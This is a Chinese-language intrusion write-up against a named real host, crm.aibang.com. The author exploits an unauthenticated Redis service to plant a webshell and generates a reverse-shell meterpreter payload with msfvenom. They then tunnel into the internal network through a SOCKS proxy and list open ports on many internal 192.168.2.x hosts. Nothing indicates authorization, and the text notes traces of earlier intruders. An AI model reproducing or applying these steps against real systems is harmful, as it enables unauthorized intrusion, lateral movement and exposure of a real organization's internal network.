0x1 Getshell

通过扫描,发现

crm.aibang.com (60.28.211.171)

在6379端口开放redis服务,未经过授权即可进行操作。

通过弱点扫描,发现

https://60.28.211.171/phpinfo.php

得知web路径为/home/abui/htdocs/

利用redis写入webshell。
 

1.png


 

2.png



还发现了前人的痕迹。
 

111.png



0x2 进内网

查看网络信息.

/sbin/ifconfig
 

4.png



[4]

查看 /etc/hosts ,发现内网网段是在192.168.2.1/24。
 

3.jpg



把本机代理进内网。

① 通过http service的代理

webshell非root权限,对web目录无写权限。失败。

②通过meterpreter的代理功能

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4949 -f elf > shell
 

6.jpg



使用 auxiliary/server/socks4a,未成功。

使用 auxiliary/scanner/portscan/tcp 扫描端口。效果不好,经常掉线,放弃。
 

5.jpg



③使用 sockes5.py

在目标机上运行sockes5.py,本机通过proxychains4成功代理进入内网。


0x3 扩大战果

进入内网后,本相使用nmap来进行扫描,在Mac OS X 10.11下,proxychains4通过命令行使用会出现问题,在mac os进入系统恢复模式,终端输入csrutil disable才能在命令行使用。

但是通过proxychains4使用nmap –sT -Pn 的时候,出现扫描不出端口开放信息的情况。放弃使用nmap。

自己写个python脚本,通过socket判断端口是否开放。

部分ip端口开放信息。
 

192.168.2.1 Open:[3306, 22] 192.168.2.2 Open:[22, 6379] 192.168.2.4 Open:[22] 192.168.2.5 Open:[3306, 22] 192.168.2.6 Open:[22] 192.168.2.8 Open:[3306, 22] 192.168.2.9 Open:[80, 22, 8080] 192.168.2.10 Open:[80, 3306, 22, 6379] 192.168.2.11 Open:[22] 192.168.2.12 Open:[80, 22, 8080] 192.168.2.13 Open:[80, 22, 8080] 192.168.2.14 Open:[80, 22, 8080] 192.168.2.15 Open:[22] 192.168.2.16 Open:[22] 192.168.2.18 Open:[22] 192.168.2.19 Open:[22] 192.168.2.20 Open:[80, 22, 8080, 6379] 192.168.2.21 Open:[22] 192.168.2.22 Open:[22] 192.168.2.23 Open:[22] 192.168.2.24 Open:[22] 192.168.2.25 Open:[80, 3306, 22, 8080] 192.168.2.26 Open:[3306, 22] 192.168.2.27 Open:[3306, 22] 192.168.2.28 Open:[80, 22, 8080, 6379] 192.168.2.29 Open:[22] 192.168.2.30 Open:[22] 192.168.2.31 Open:[22] 192.168.2.32 Open:[22] 192.168.2.33 Open:[22] 192.168.2.34 Open:[3306, 22, 8080] 192.168.2.35 Open:[22] 192.168.2.37 Open:[3306, 22] 192.168.2.38 Open:[22] 192.168.2.39 Open:[80, 22, 8080] 192.168.2.40 Open:[3306, 22] 192.168.2.41 Open:[3306, 22] 192.168.2.42 Open:[80, 22, 8080] 192.168.2.43 Open:[22] 192.168.2.44 Open:[80, 22, 8080] 192.168.2.45 Open:[80, 22, 8080, 6379] 192.168.2.47 Open:[22, 6379] 192.168.2.46 Open:[6379] 192.168.2.48 Open:[3306, 22, 6379] 192.168.2.49 Open:[3306, 22, 6379] 192.168.2.50 Open:[80, 3306, 22] 192.168.2.51 Open:[80, 22] 192.168.2.61 Open:[3306, 22] 192.168.2.64 Open:[3306, 22] 192.168.2.66 Open:[80, 22, 8080] 192.168.2.68 Open:[80, 22, 8080] 192.168.2.75 Open:[22] 192.168.2.76 Open:[22] 192.168.2.77 Open:[22] 192.168.2.78 Open:[22] 192.168.2.79 Open:[22] 192.168.2.80 Open:[22] 192.168.2.81 Open:[22] 192.168.2.82 Open:[22] 192.168.2.83 Open:[22] 192.168.2.84 Open:[22] 192.168.2.85 Open:[22] 192.168.2.86 Open:[22] 192.168.2.87 Open:[22] 192.168.2.88 Open:[22] 192.168.2.89 Open:[80, 22, 8080] 192.168.2.90 Open:[22] 192.168.2.93 Open:[80, 3306, 22] 192.168.2.94 Open:[80, 22, 8080] 192.168.2.95 Open:[22] 192.168.2.96 Open:[80, 22, 8080] 192.168.2.100 Open:[22, 6379] 192.168.2.101 Open:[80, 22, 8080] 192.168.2.102 Open:[3306, 22] 192.168.2.103 Open:[80, 22, 8080] 192.168.2.104 Open:[80, 3306, 22]